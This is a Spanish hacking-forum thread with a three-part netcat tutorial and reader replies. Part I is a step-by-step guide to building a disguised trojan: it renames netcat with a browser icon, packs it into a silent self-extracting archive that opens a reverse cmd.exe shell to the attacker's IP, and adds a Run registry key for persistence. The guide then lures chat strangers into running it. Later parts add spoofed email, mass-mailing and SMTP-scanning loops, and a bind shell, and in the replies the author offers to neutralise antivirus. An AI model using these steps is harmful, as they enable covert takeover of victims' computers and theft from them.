Foro de elhacker.net

Seguridad Informática => Hacking Básico => Mensaje iniciado por: WHK en 25 Marzo 2007, 03:17 am



Título: Jugando con netcat
Publicado por: WHK en 25 Marzo 2007, 03:17 am

JUGANDO CON NETCAT V1.1
                Parte I


Como ya les habrán enseñado a utilizar el netcat, ahora yo les quiero enseñar como sacarle el jugo a este programilla muy útil… lo convertiremos desde un troyano hasta un cliente SMTP entre otras cosas.


TROYANIZANDO NETCAT

Como ya saben, con netcat puedes tomar una shell directamente o realizar una conexión inversa indicando mi IP o dirección DNS (para los que no saben lo que es un DNS… es un tipo de traducción que hace mas fácil poder encontrar tu PC, por ejemplo la IP 200.32.22.25 sería el DNS = pagina.cl ).

Bueno… primero hay que saber lo que vamos a hacer… la idea principal será tomar una shell de la PC de cualquier persona de un IRC (Chat).

Materiales:
ResHacker
Netcat v1.1
Winrar (Modo grafico)
Un icono de Internet Explorer.

Bueno, si no saben donde encontrar el icono tratare de dárselos con este documento XD si no se puede pueden usar cualquier otro icono (puedes hacerlo sin iconos también pero se verá sospechoso.)

Lo primero es conectarse a un Chat XD y conseguirse a alguna victima (ojala no lo hagan con sus novias porque si los pillan los van a patear XD ) … una ves que digan.. “esa es mi victimaaaaa!!!”  entonces usaremos algo que se llama ingeniería social y es a través del ingenio propio hacerse pasar por alguien o hacerse de la amistad de esa persona para poder obtener lo que queremos, la idea es que hablaremos con el y bla bla bla de donde eres bla bla bla… cuando termines le dices que otro día seguimos conversando… si todo va bien ps ya mañana tendrás la confianza suficiente como para darle un programa que le ayudará en el mantenimiento de su PC o que simplemente se divierta con un juego XD.

Dejamos de lado el Chat y en la noche nos ponemos a hacer el troyano de la siguiente forma:

Paso 1: Primero le cambiamos el icono para que sea menos sospechoso con el ResHacker:

(http://test.drawcoders.net/netcat/imagenes/1.gif)

En primer lugar abres el ResHacker y le das en "File/Open" y buscas el netcat. Después pinchas en acción y luego en "Add a new Resource", luego se verá la ventana que ves a la derecha y presionas donde dice “Open file with new resource” (paso 3) para buscar el icono que teniamos, luego donde dice “Resource Name” Debes escribir la palabra “ICON” tal como se ve en la foto y para finalizar presionamos en “Add Resource” y en “File/Save”. Con todo esto te creará un respaldo del netcat original que puedes borrarlo con toda tranquilidad y al refrescar la pantalla (F5)  veras que el netcat tiene el mismo icono de Internet Explorer XD

(http://test.drawcoders.net/netcat/imagenes/2.gif)

Paso 2: renombramos nc.exe y desde ahora se llamará “iexplorer.exe” XD, luego pinchas el netcat con el botón derecho de tu Mouse y deberá aparecer algo así (obviamente después de haber instalado el winrar.)

(http://test.drawcoders.net/netcat/imagenes/3.gif)

Luego aparecerá el Winrar y empezaremos a crear nuestro troyano:

1.

(http://test.drawcoders.net/netcat/imagenes/4.gif)

Donde dice “Nombre del archivo” le escribimos “carnada.exe” (por ahora), el formato debe ser en “RAR” el método de compresión el mejor y por último y mas importante “Crear un archivo SFX”, el resto debe quedas deseleccionado.


2.

(http://test.drawcoders.net/netcat/imagenes/5.gif)

En la pestaña “Avanzado” (arriba) debes pinchar el botón llamado “Opciones SFX” y comenzaremos a configurar nuestro Winrar SFX.


3.

(http://test.drawcoders.net/netcat/imagenes/6.gif)

Ahora en “Carpeta de extracción” le diremos que descomprima el netcat (con nombre de iexplorer) en el directorio = %homedrive%%homepath%\update , ahora me diran: “Que es esto?!!”… %homedrive% significa que se descomprimirá dentro de la misma unidad de disco que esté Windows, o sea comúnmente (no siempre) “C:\” … %homepath% significa “Documents and settings\tu usuario actual” en conclusión se descomprimirá dentro del directorio raiz del usuario donde es casi el único lugar donde un usuario sin derechos de administrador puede sobrescribir, en otras palabras si le hubiese escrito %windir%\system32 pudiera haber tenido fallas al descomprimirse ya que no todos tienen derecho a ese directorio. Elegí una carpeta llamada update para llamar menos la atención.
En “Ejecutar tras la extracción” le escribimos esto = iexplorer.exe -d -e cmd.exe [aca va nuestra ip] 80 , yo le puse la dirección 127.0.0.1 para pruebas pero ustedes le ponen la ip real que sale a Internet. 80 es el puerto donde el troyano se conectará con nosotros.

En “Ejecutar antes de la extracción” le escribimos lo siguiente = %windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\update\iexplorer.exe -d -e cmd.exe 127.0.0.1 80" /f > nul … y ustedes me diran que es eso!!!!... le decimos que ejecute la consola de comandos CMD y llame a un ejecutable llamado “REG.EXE” el cual se encargará de agregar nuestra entrada al registro del sistema para que el troyano arranque solito cada ves que encienda la pc (recordar que donde dice 127.0.0.1 deben poner la ip de ustedes o en algunos casos (para los que saben) su DNS… es mas efectivo. (Consultar por el no-ip) y donde dice >nul significa que la victima no verá mas que un simple pestañazo del DOS en ves de mostrar todo lo que se está ejecutando.


4.

(http://test.drawcoders.net/netcat/imagenes/7.gif)

Acá estamos pidiendo a winrar que no muestre nada mientras se instala todo esto, asi será mas silencioso, rápido y automatizado.


5.

(http://test.drawcoders.net/netcat/imagenes/8.gif)

Por último cargamos un icono atractivo para que se vea con el troyano ya compilado y aceptamos todas las ventanas.


Debería quedar algo así:

(http://test.drawcoders.net/netcat/imagenes/9.gif)

Yo le puse icono de yahoo porque lo voy a probar desde el mismo Chat.


Ahora vamos a crear el programa que nos conectará con la victima, y se llama “Cliente”
Solo ejecutamos esto y estaremos listos para recibir la conexión de quien abra la carnada:

(http://test.drawcoders.net/netcat/imagenes/10.gif)

Y listo :D ahora solo falta visitar a nuestro amigo del día anterior y decirle que tienes un juego muy chido o que tienes algo para no se… usa tu imaginación. En mi caso y entré a una sala de yahoo y como hoy en día esta muy de moda los booters XD puse en sala que bajaran un antibooter para que no los pudieran sacar de la sala y les pase un link con la dirección donde estaba alojado el troyano. En resumidas cuentas… si alguien cae en tus maldades te debe aparecer esto:

(http://test.drawcoders.net/netcat/imagenes/11.gif)

Habrás tomado la shell de otra PC (manejar una shell de otra pc significa poder controlar el DOS de Windows o la shell de GNU.. es poder controlar la consola de comandos de la otra persona y a través de eso puedes subirle archivos, borrarle cosas, darle troyanos que te permitan ver su escritorio… mirar sus contraseñas volcando el registro en textos y asíéndoles un “type”… para los que saben un poquitito mas.. talvez saltar a otras pc con netbios, exploits como el dcom, acceder a servidores y dominar una red completa y ufff.. a volar la imaginación. Si no me creen miren estas tres capturas jugando con netcat XD nada serio:


1. El sueño de todo lamer XD :

(http://test.drawcoders.net/netcat/imagenes/12.gif)


2. Subiendo RealVnc4 para poder hacer una conexión iversa y mirar el escritorio de la otra persona:

(http://test.drawcoders.net/netcat/imagenes/13.gif)


3. Esto fue un ajuste de cuentas XD:

(http://test.drawcoders.net/netcat/imagenes/14.gif)


Les mostré como crear un troyano con netcat (indetectable por todos los antivirus por ahora) también puede hacerse con una conexión directa en ves de una inversa como la hice acá, así como ya saben hacerlo ;)

Esto es todo y espero poder mostrarles la próxima ves.. como convertir el Netcat v1.1 en un cliente SMTP para enviar correos automatizados y temporizados además de servir como cliente FTP con comandos automatizados sin la necesidad de la intervención de escribir los comandos desde la consola, también como ponerle contraseña a una sesión de shell con netcat entre muchas otras cosas mas ;)

Descargar en PDF (http://www.jccharry.com/greencode/filemanager/index.php?wfm-ruta=%2FCreaciones+propias%2FJugando+con+NetCat%2F%5BPDF%5DJugando-con-NetCat_I.rar)
Descargar video explicativo (http://www.jccharry.com/greencode/filemanager/index.php?wfm-ruta=%2FCreaciones+propias%2FJugando+con+NetCat%2F%5BVideo%5DJugando-con-NetCat_I.rar)

Preguntas mas frecuentes:
¿Porque me aparece que el archivo no existe?
R: http://foro.elhacker.net/index.php/topic,159799.msg860791.html#msg860791

¿Porque me dice error win32?
R: Estas intentando cambiar el icono al netcat V1.1, intenta con el 1.0

¿Porque me dice ""nc" no es un comando reconocido"?
R: http://foro.elhacker.net/index.php/topic,159799.msg758631.html#msg758631

¿Porque me aparece "h_errno 11001: HOST_NOT_FOUND" ?
R: http://foro.elhacker.net/index.php/topic,159799.msg754376.html#msg754376

Salu2 Att. Yan.
Unilola Software.



Enlaces actualizados
Actualmente casi todos los enlaces de descargas e imágenes no están pero los acabo de subir todos a este link incluyendo todos los videos:
http://tinyurl.com/3duv6qh


Título: Re: Jugando con netcat
Publicado por: WHK en 25 Marzo 2007, 05:32 am
JUGANDO CON NETCAT V1.1
                Parte II



TRANSFORMANDO NETCAT EN UN CLIENTE SMTP Y FTP

Bueno… ahora les mostraré que no es necesario usar el bombermail, el feeboti, xmass o cualquier pendejada para enviar un correo sin tener que usar telnet. Claro está que hay programas que tienen muchas funciones como libreta de direcciones, escaneadotes de servidores SMTP, comprobación de usuarios y otras cosas que nos hacen todo ya automatizado en una linda ventanita grafica pequeña o tremendas presentaciones flash como el bomber de dragon XD, pero todo lo que pueden hacer estos programas… también puede hacerlo tu Netcat v1.1.

Materiales:
Netcat v1.1
Un editor de texto (el block de notas es ideal)


Si se han fijado… enviar un mail desde una consola NT no es muy fácil porque no viene por defecto algun programa que lo haga como el comando mail de GNU, pero si obtenemos una shell remota sobre una pc con netcat… puedes usar el mismo para enviar correos, archivos y lo que se te de la gana.

Creamos un texto con el block de notas que contenga lo siguiente:

helo queteimporta@yahoo.com
mail from: yan@anonimo.com
rcpt to: yan_uniko_102@yahoo.com.mx
data
From: yan@anonimo.com
To: yan_uniko_102@yahoo.com.mx
Subject: Provando netcat

Este es mi primer mensaje enviado con netcat
.


Bueno y que es esto en resumidas palabras?:
Helo      = nos identificamos
mail from   = correo proveniente
rcpt to      = correo destino
data      = el mensaje en si.

Dentro del mensaje decimos que el correo proviene desde  yan@anonimo.com para yan_uniko_102@yahoo.com.mx con el sujeto: probando netcat y con el mensaje: “Este es mi primer mensaje enviado con netcat”. Ahora fíjense de dos detalles muy importantes. Uno es el espacio en blanco entre la cabecera del mensaje y el mensaje en si (entre “subset” y “este es mi…”) y segundo el punto al final del mensaje.
Lo guardamos como queramos, yo elegí guardarlo como “mensaje.txt” y ejecuté lo siguiente:  type mensaje.txt|nc -vv -w 3 127.0.0.1 25 y me apareció algo como esto:

(http://test.drawcoders.net/netcat/imagenes/15.gif)

Puedes ver que todos los comandos que escribimos en el notepad se volcaron al netcat y se realizó la conexión y el envío automatizado. Ahora analicemos el comando un poco.

type mensaje.txt|nc -vv -w 3 127.0.0.1 25

type mensaje.txt   = decimos que se vuelque el contenido de mensaje.txt en pantalla
|         = decimos que al mismo tiempo ejecute el siguiente comando
nc -vv -w 3 127.0.0.1 25 = decimos que netcat se conecte al host 127.0.0.1 (servidor SMTP) hacia el puerto 25… -w 3 significa que espere tres segundos antes de enviar el correo para darle tiempo al servidor de reaccionar… -vv (Very Verbose) significa que te muestre lo que se está haciendo.

Podemos utilizar comandos como –attach para enviar archivos adjuntos o crear nuestras propias planillas en texto y con un simple bat… enviarlos a distintos destinatarios… podemos jugar mucho con este codigo hasta hacer un enorme bat que recoja el mismo mensaje para diferentes destinatarios dentro de un texto guardado llamado user a través del comando “for”. (el spam es delito XD ). Una buena ventaja de todo esto es que puedes hacer el texto con el comando echo de la siguiente manera:

Echo helo queteimporta@yahoo.com > mensaje.txt
Echo mail from: yan@anonimo.com >> mensaje.txt
Echo rcpt to: yan_uniko_102@yahoo.com.mx >> mensaje.txt
Echo data  >> mensaje.txt
Echo From: yan@anonimo.com >> mensaje.txt
Echo To: yan_uniko_102@yahoo.com.mx >> mensaje.txt
Echo Subject: Provando netcat >> mensaje.txt
Echo. >> mensaje.txt
Echo Este es mi primer mensaje enviado con netcat >> mensaje.txt
Echo . >> mensaje.txt


O puedes usar el comando for de la siguiente manera:

for /f %%i in (direcciones.txt) do Echo rcpt to: %%i >> mensaje.txt

y ufff  puedes hacer mil cosas como hasta escanear servidores SMTP con netcat hacienda un:

for /l %%i in (1,1,254) do if errorlevel = 0 nc 1 192.168.1.%%i 25|find "smtp" && echo 192.168.1.%%i >>escaner.txt

y los que estén dentro del rango de IPs seleccionadas y que respondan al puerto 25 con un barrer SMTP se escribirá su IP dentro de un texto llamado scanner.txt… también puedes usar el comando for para volcar textos con un listado amplio de IPs creados talvez por el dictmake.exe o el brainscan.exe o con otro bat XD.

Yo puse 127.0.0.1 de servidor en el primer ejemplo porque yo mismo utilicé un minirelay para poder enviar el correo ya que me dio flojera buscar un servidor para probar :p

(http://test.drawcoders.net/netcat/imagenes/16.gif)

Y al revisar el correo me encontré con mi netcat :D

(http://test.drawcoders.net/netcat/imagenes/17.gif)

Ahora esto también sirve para automatizar subidas y descargas de archivos a un ftp con tu netcat y decir por ejemplo que cada una hora me respalde mis archivos en mi ftp pero que primero borre los antiguos, en resumidas palabras seria algo así:

type comando.txt|nc -vv -w 3 127.0.0.1 21

y el commando.txt diría algo así:

user usuario
pass password
dele respaldo.rar
etc etc etc y al final quit


y veras como el netcat entra a tu ftp, borra el respaldo y coloca el nuevo. Para poder temporizar esto puedes usar un comando muy facil que me enseñó un muy buen amigo mío (Octhal):

ping 127.0.0.1 -n 2  >nul

Esto equivale a un segundo… o sea para que esto se transforme en una hora quedaría así:

ping 127.0.0.1 -n 7200  >nul

Con todo esto tu bat debería quedar así:

@Echo off
Cls
:1
Echo Ultima actualizacion: %time% %date%
type comando.txt|nc -vv -w 3 127.0.0.1 21
ping 127.0.0.1 -n 7200  >nul
goto 1


Decimos que respalde nuestros archivos y que después de una hora se haga un goto para hacer un loop. También puedes usar esto para subir archivos desde una PC tomada con tu shell y ponerles, obviamente tu como servidor.

Como puedes ver… acá mostré como hacer interactuar el netcat con un servidor y transformarlo en un anonimail XD o ftp client… también puedes hacer un consultador SQL, un bot IRC, un cliente tftp… etc etc etc… es solo cosa de imaginación ;)
La próxima vez les enseñaré como ponerle contraseña a netcat para que nadie usurpe tus shells con o sin conocimientos de programación.
Hasta la prox.

Descargar en PDF (http://www.jccharry.com/greencode/filemanager/index.php?wfm-ruta=%2FCreaciones+propias%2FJugando+con+NetCat%2F%5BPDF%5DJugando-con-NetCat_II.rar)
Ver video explicativo (http://www.jccharry.com/greencode/filemanager/index.php?wfm-ruta=%2FCreaciones+propias%2FJugando+con+NetCat%2F%5BVideo%5DJugando-con-NetCat_II.rar)

Att. Yan
Unilola Software


Título: Re: Jugando con netcat
Publicado por: WHK en 25 Marzo 2007, 06:32 am
JUGANDO CON NETCAT V1.1
              Parte III



PONIENDO UNA CONTRASEÑA A TUS SHELLS

Ahora les demostraré que no es necesario saber programar en C para crear un dispositivo que nos permita entrar en una shell a través de una contraseña.

Lo primero es abrir el block de notas y escribimos lo siguiente:

@echo off
if not exist ips.txt (goto 1) else goto 2

:1
Echo ips.txt no existe :(
Echo.
pause
exit

:2
for /f %%i in (ips.txt) do netstat -n|find "%%i" && CMD
Echo Te has desconectado del servidor remoto.
Exit


Ahora me diras.. que es esto?!.. tranquilo, después lo explico XD. Ahora crea otro texto llamado “Iniciar servidor.bat” con el siguiente contenido:

start nc -L -d -e index.bat -p 5051

También lo explicaré después… ahora crea otro texto llamado “Detener servidor.bat” con el siguiente contenido:

tskill nc

Luego crea un texto llamado ips.txt y dentro del texto le escribes tu ip y las ip que tu quieres que tengan acceso a esa shell, y por último pon el netcat junto con todo esto en una carpeta guardada por ahí talves en system32 o donde tu quieras pero todo debe estar en el mismo lugar a menos que quieras modificar el codigo fuente del bat.
Es hora de dar las explicaciones:

Al abrir el bat llamado “iniciar servidor.bat” ejecutaras el netcat y lo dejaras a escucha de otro bat llamado “index.bat” en el puerto 5051 (a elección), luego si alguien se conecta a tu shell se iniciará netcat y comenzará a leer los comandos del bat y resolverá lo siguiente:

if not exist ips.txt (goto 1) else goto 2
:1
Echo pass.txt no existe :(
Echo.
pause
exit


Esto significa que si no existe el archivo con las IP, entonces solo se cierra botándote de la shell, si existe entonces procede a hacer el chequeo:

for /f %%i in (ips.txt) do netstat -n|find "%%i" && CMD
Echo Te has desconectado del servidor remoto.
Exit


Nos fijaremos principalmente en la primera línea de esta frase y analizaremos que %%i se transforma en las ip puestas en el texto llamado “ips.txt” y ejecuta: netstat -n|find "%%i" && CMD lo cual significa que hace un netstat –n mostrando todas las ip conectadas a ti (incluyendo el que está pidiendo la shell) y al mismo tiempo el comando find busca entre todas esas IPs que estan conectadas si coincide alguna con la ip señalada en el texto y si esta aparece ejecuta CMD y si no aparece te bota de la shell :P (Por eso es recomendable no poner mas que solo tu ip dentro de ese texto porque si hay un usuario logueado entonces todos los demas tendran acceso libre sin autentificación. Y ojala no sea 127.0.0.1 ni tu ip externa porque puede prestarse para confusiones y no servirá de nada todo esto.)
El comando tskill nc significa que mata el proceso llamado nc (el comando tskill viene con todos los Sistemas Operativos NT desde Windows Xp con SP2 en adelante o puedes reemplazarlo por otros comandos que destruyan el proceso)

Como puedes ver no fue necesario saber programar en C para ponerle un acceso seguro a tu shell y que nadie mas te la quite. Esto puede ser muy útiles para administradores de pequeñas redes que quieren tener acceso a ciertos puntos de redes desde el servidor o para que nadie mas se meta en la PC de tu novia mas que tu XD.


PARA PROGRAMADORES

Para los programadores en C puedes probar con una sentencia if donde if pass=[loquequieras] un ejemplo:

#include <stdio.h>
#include <stdlib.h>
main()
{
int usuario,clave=84262;
printf("Introduce la contraseña: ");
scanf("%d",&usuario);
if(usuario==clave)
printf("Acceso concedido!.\n\n");
else
exit (1);
system("cmd.exe");
exit (0);
}


Esto se me ocurrió en mis ratos de ocio XD, cuando lo abres te pide una contraseña y si es la escrita en el codigo fuente, ps te da la shell y si no te da una salida limpia.

Listo amigos… hasta aca llego por ahora.. ya es tarde y otro dia continuo… a grandes rasgos quise demostrar que no se necesita ser programador en C o ingeniero en programación para poder ponerle una pequeña contraseña automatica por asi decirlo :p tambien puedes reemplazar las ip por dominios DNS y reemplazar el comando netstat –n por netstat solamente. Tambien puedes hacer cosas mucho mas eficientes y complejas pero la idea es que por ahora todos sin importar sus conocimientos puedan hacer esto.

Descargar en formato PDF (http://www.jccharry.com/greencode/filemanager/index.php?wfm-ruta=%2FCreaciones+propias%2FJugando+con+NetCat%2F%5BPDF%5DJugando-con-NetCat_III.rar)
Ver video explicativo (http://www.jccharry.com/greencode/filemanager/index.php?wfm-ruta=%2FCreaciones+propias%2FJugando+con+NetCat%2F%5BVideo%5DJugando-con-NetCat_III.rar)

Att. Yan
Unilola Software.


Título: Re: Jugando con netcat
Publicado por: Mad Antrax en 25 Marzo 2007, 13:21 pm
He movido mi mensaje, te quedó muy bonito el manual. A seguir así!!

Saludos


Título: Re: Jugando con netcat
Publicado por: Zedmix en 25 Marzo 2007, 13:47 pm
Felicidades, muy completito.

Saludos


Título: Re: Jugando con netcat
Publicado por: zhyzura en 25 Marzo 2007, 22:47 pm
enhorabuena por tu manual!!!

me hizo recordar muchas cosas cuando lo lei :P

lo he agregado al recopilatorio de post.

saludos


Título: Re: Jugando con netcat
Publicado por: Ilorev en 26 Marzo 2007, 00:31 am
hola!!
ta jevi!!!!
saludos


Título: Re: Jugando con netcat
Publicado por: .NiXoN. en 26 Marzo 2007, 14:44 pm
Wenas !!

Muy bueno el Manual, sí señor !! Eso sí que es sacar jugo...jajaja

Saludos !!


Título: Re: Jugando con netcat
Publicado por: fitu en 27 Marzo 2007, 02:42 am
Hola a todo... posteo pq me surgio un problema, cree el sfx y siguiendo tal cual los pasos, hasta me consegui un icono del msn...
luego abro una ventana y escribo "nc -vv -L -p 80" y despues pruebo hacele click a mi sfx... pasa lo siguiente...
*se me descomprimen los archivos en \update
*se me crea el registro tal cual lo necesito
pero ! no me hace la shell y en cambio me dice: iexplorer.exe no es una aplicacion Win32 valida.
depues de eso acepto... pq no me queda otra y nada... nunca se me hizo la shell...
corrobore los ips y estan bien... no se q puede estar pasando... alguna sugerencia?
gracias :D
y Muy bueno el manual :p aunque no me funciones xD


Título: Re: Jugando con netcat
Publicado por: ChizzoColman en 27 Marzo 2007, 04:01 am
Hola que tal..
En la parte I del manual..Una vez que hago "carnada.exe" y para probarlo lo ejecuto pero me sale un cartel de error que dice "Window no puede encontrar el archivo 'iexplorer.exe'.Asegurese que la ruta y el nombre del archivo estan escritos correctamente y vuelva a intentarlo. Para buscar un archivo, haga click en el boton Inicio y luego en Buscar."


Título: Re: Jugando con netcat
Publicado por: WHK en 27 Marzo 2007, 04:13 am
aver... las imagenes son reales y las saque mientras lo creaba y al final si me dió la shell, verifiqué algunas cosas y vi que en la primera imagen dice: "%homepath%\update" y en el texto puse que hay que poner "%homedrive%%homepath%\update" y por eso cuando lo ejecutas talves se te descomprime en otra unidad y no encuentra el archivo... mm que mas puede ser?... si te lo descomprime y ves que se descomprimió bien y da eror al ejecutarlo significa que hiciste algo mal al tratar de cambiar el icono y se transformó en un ejecutable corrupto. recuerda que entre "%homedrive%%homepath%" no hay "\" .. que mas puede ser,... ps no se... a mi si me resulta.. si alguien mas tiene el mismo problema porfavor lo diga :-s
Yo lo probé en el XP pero en los demas windows tambien usan path a menos que sea un win 95 o algo asi Aunque no creo XD


Título: Re: Jugando con netcat
Publicado por: en 27 Marzo 2007, 04:35 am
hi

felicidades

la verdad eXPLICAS MUY BIEN :)

cya


Título: Re: Jugando con netcat
Publicado por: fitu en 27 Marzo 2007, 06:24 am
hmmm la verdad q no se q es... yo lo de %homedrive%%homepath%\update lo ponia asi ... me di cuenta q en la imagen faltaba... despues la \ no la pongo... y no creo q sea el icono, pq despues del error lo q hice fue hacer otro sin icono (te queda el del winrar) y no me funciono tampoco :S no se q hacer... iwal gracias por contestar  :D

PD: uso win xp sp2... asi q tendria q funcinar :s


Título: Re: Jugando con netcat
Publicado por: wACtOr en 27 Marzo 2007, 13:34 pm
puede ser que el antivirus te lo aya neutralizado. a mi me pasaba lo mismo cn el craagle. yo no tenia antivirus, pero tenia el kims, y al instlar el nod, me jodio mogollon de archivos. mira aver no tengas un antivirus instlado o algo.


Título: Re: Jugando con netcat
Publicado por: Novlucker en 27 Marzo 2007, 14:56 pm
El problema lo estan teniendo a la hora de crear el ejecutable con el reshacker, ya que lo que se propone es cambiar el icono del nc, pero eso a veces da problemas, prueben crear el archivo final, pero sin cambiar el icono del nc, probablemente sea ese el problema

salu2


Título: Re: Jugando con netcat
Publicado por: Jers_Tc en 27 Marzo 2007, 19:58 pm
mira tengo 2 problemas con el primer de jugando con el netcat 1 y no m salio muy bien al hace lo del winrar pero .. de ahyh m explikas eso mira lo k sucede toy probando lo de los mensajes tipeo sto en em cmd .. type email.txt|nc -vv -w 3 127.0.01 << (coloco mi ip) y puerto 25 del SMTP pero ya presiono entrer y me sale connection refused - send  0, rcvd 0:NOTSOCK
- abri otra ventana con el nc y le di nc -vv -L -p (mi ip) puerto 4447 para ver si faltaba eso pero m vota = al mandar el mensaje.. weno toy aprendiendo a usar el netcat :) asi que please paciencia conmigo :P :P y sorry por las molestias nuevamente saludos


Título: Re: Jugando con netcat
Publicado por: Grave en 27 Marzo 2007, 20:08 pm
Gracias por el Tuto, esta chulo, pero tengo un problema los antivirus de Symantec identifican a Netcat como un archivo malicioso y yo ni siquiera estoy en una maquina con Norton sino en una con "Symantec Client Security", ahora segun se solo Symantec hace esto y ya que la mayoria de victimas usan Norton es algo improbable que funcione y yo he pensado si es posible desactivar o anular este antivirus con el "Regedit", hay alguna forma de hacer esto para crear un instalador y hacer desde ahi las modificaciones o talvez con un batch... 


Título: Re: Jugando con netcat
Publicado por: Jers_Tc en 27 Marzo 2007, 20:16 pm
 ;D Oie man si alguien le falla Jugando con el Netcat la 1 - el problema ese que te bota archivo no encontrado ese error pues el problema es el antivirus .. el NOD32 bloquea esa mela de archivo ?? p's y no deja instalarlo .. si le das en salir al NOD32 y prubas se te instala correctamente :D:D Saludos y ayudenme con lo de la parte 2 que me sale :S Connection Refused :(


Título: Re: Jugando con netcat
Publicado por: WHK en 27 Marzo 2007, 21:27 pm
No sabia que el antivirus lo detectaba :p, al principio pensaba que podría ser el cortafuegos que trae simantec o norton que hace que te rechaze la coneción ya que para poder escuchar con el cliente Debes ponerte de servidor(creo que asi es en el caso del que no le funciona lo del mail) si es asi solo hay que desactivar el cortafuegos ya que lo hice en conexión inversa porque asi tu tienes que ponerte de servidor y puedes manejar a tu modo el cortafuegos, no asi la victima que solo realizará una conexión al puerto 80 (hablo de la parte n1)
Mi consejo es que se fijen muy bien en el cortafuegos y si es asi entonces no habría problema con la victima.
Quedé impresionado al escuchar que nod toma al nc como troyano ya que se supone que nc es una herramienta GNU (unix/liunux) y no un troyano.. ahora, que lo usemos como troyano es otro cuento XD.
si quieren puedo enseñarles a neutralizar el nod32 pero la victima sospecharía ya que esto asecinaría el proceso de nod.

la idea es con un bat hacer un "reg delete" y un "reg add" que elimine el arranque del nod y ejecute la descompresión despues. ponerle winrar en modo consola junto a la carnada cifrada con una contraseña y de esta forma podría pasar... no tengo NOD32 porque la verdad no uso antivirus XD solo cortafuegos y otras cosas pero lo instalaré para estudiarlo mejor y hacer un nuevo pack. Incluiré archivos *.js que se ejecutarán en caso de no tener instalado el dream weaver... de esta forma se ejecutan los scripts sin tantos pestañazos del DOS. Ademas hice este manual solo para explicar algo básico con una buena base para que ustedes puedan modificarlo a su gusto porque si nos vamos a complicr la vida mejor cremos un progrma compilado en c que detenga el proceso de algunos antivirus sin que se vea nada añadiendo un icono y un proceso falso al original (como el degoyador 3.2 que hice hace algun tiempo) y que ñada registros para que no pueda restaurar sistema, otro para que no aparezca el proceso en el administrador de tareas o hacer correr el netcat como un servicio, etc etc...  pero trataré de hacerlo de la forma mas facil y despues trataré de hacer algo un poco mas complicado... denme un poco de tiempo. Y como veo que no quedó bien claro las imagenes voy a tener que hacer un video tutorial XD no demoro.


Título: Re: Jugando con netcat
Publicado por: WHK en 27 Marzo 2007, 22:13 pm
Hecho!. los videos estan acá:

http://whk.h4ck1ng.net/
En la sección de descargas.

también puse los links debjo de cada post original para que asi nadie diga despues: "Donde estan los videos??? no los veo."


Título: Re: Jugando con netcat
Publicado por: Novlucker en 27 Marzo 2007, 22:38 pm
Citar
mira tengo 2 problemas con el primer de jugando con el netcat 1 y no m salio muy bien al hace lo del winrar pero .. de ahyh m explikas eso mira lo k sucede toy probando lo de los mensajes tipeo sto en em cmd .. type email.txt|nc -vv -w 3 127.0.01 << (coloco mi ip) y puerto 25 del SMTP pero ya presiono entrer y me sale connection refused - send  0, rcvd 0:NOTSOCK

Jers_Tc , revisaste que tu servidor smpt, en este caso tu pc, este correcto???


Título: Re: Jugando con netcat
Publicado por: 0101 en 27 Marzo 2007, 22:52 pm
Hola muy bueno tu manual , esta muy bien explicado , pero tengo un problema a la hora que pongo  nc -vv -L -p 80  , me sale esto :

forward host lookup failed: h_errno 11001: HOST_NOT_FOUND  :rolleyes:

sabes a que se debe? .. saludos!


Título: Re: Jugando con netcat
Publicado por: WHK en 27 Marzo 2007, 23:05 pm
Consulté a mi querido y buen amigo "sangoogle" y me dijo que el error "h_errno 11001: HOST_NOT_FOUND" se debia a que es una version que utiliza el winsock.h mal compilado por lo cual no trabaja bien.. intenta con el mio, lo añadiré a la pagina:

http://whk.sitehacking.net/
En la sección de descargas.

y una última cosa: han visitado mucho este post por lo cual geocities no ha resistido y se blokeó temporalmente las descargas incluyendo las imagenes asi que tendré que buscar otro lado para cambiar de lugar las imagenes... paciencia.
Att Yan.
Unilola Software.


Título: Re: Jugando con netcat
Publicado por: Jers_Tc en 28 Marzo 2007, 03:40 am
weno ya hice too con el netcat jhice lo de enviar mensaje me resulto too tbm el de los troyanos pero el troyano me funca en mi propia pc pero caundo le mando el troyano a alguien por msn este al recibe lo abre y nunca recibo el aviso de que se conecto :S a mi puerto ... pruiebo yo aka y si sale :S a y en el msj si lo envia xvre epro cuando uso en minidelay se keda en rcpt to: ( Correo ) ... y no se conclñuye creo que ta jodiendo la config de mi equipo :S ??? ..  :huh: :huh:


Título: Re: Jugando con netcat
Publicado por: 0101 en 28 Marzo 2007, 06:54 am
Consulté a mi querido y buen amigo "sangoogle" y me dijo que el error "h_errno 11001: HOST_NOT_FOUND" se debia a que es una version que utiliza el winsock.h mal compilado por lo cual no trabaja bien.. intenta con el mio, lo añadiré a la pagina:

http://512.iespana.es/nc

y una última cosa: han visitado mucho este post por lo cual geocities no ha resistido y se blokeó temporalmente las descargas incluyendo las imagenes asi que tendré que buscar otro lado para cambiar de lugar las imagenes... paciencia.
Att Yan.
Unilola Software.

Se agradece  ;D

saludos!


Título: Re: Jugando con netcat
Publicado por: fitu en 28 Marzo 2007, 16:22 pm
Jers_Tc fijate q en el troyano le hallas puesto tu ip... supongo q tu ip es dinamica, por lo cual cuando te desconectes de internet y te vuevlvas a conectar se te va a cambiar... para eso proba con www.no-ip.com , es facil, te registras, te bajas un programita y listo... supongo q es por eso q no te anda... otra cosa... ponele la ip publica, o sea, q no sea la 127.0.0.1 ni 192.168.0.* ni 10.0.0.* o en todo caso tu dominio no ip


Título: Re: Jugando con netcat
Publicado por: Novlucker en 28 Marzo 2007, 16:40 pm
Jers_Tc , estas completamente seguro de que quien abre el archivo no esta detras de una red con cortafuego?? porque por mas que estes utilizando conexion inversa, muchas veces puede fallar

salu2


Título: Re: Jugando con netcat
Publicado por: WHK en 28 Marzo 2007, 19:27 pm
Jers_Tc ... también incluiré el mini remailer server para que puedas practicar ;) solo verifica muy bien la existencia de algun coratuegos tuyo que pueda blokearlo, recuerda que algunos antivirus vienen con un cortafuegos personal Aunque algunos ni saben que lo tienen :p

Miniremailer: http://whk.sitehacking.net/
En la sección de descargas.

Att. Yan
Unilola Software.


Título: Re: Jugando con netcat
Publicado por: ne0x en 28 Marzo 2007, 20:25 pm
CLAP CLAP CLAP !!, muy bueno.


Título: Re: Jugando con netcat
Publicado por: WHK en 28 Marzo 2007, 21:34 pm
Listo. El problema de las imagenes ya fue resuelto :D no me pregunten como lo hice porque pasé un mal rato haciendo 25 hostings para que asi no se caiga ninguna XD.

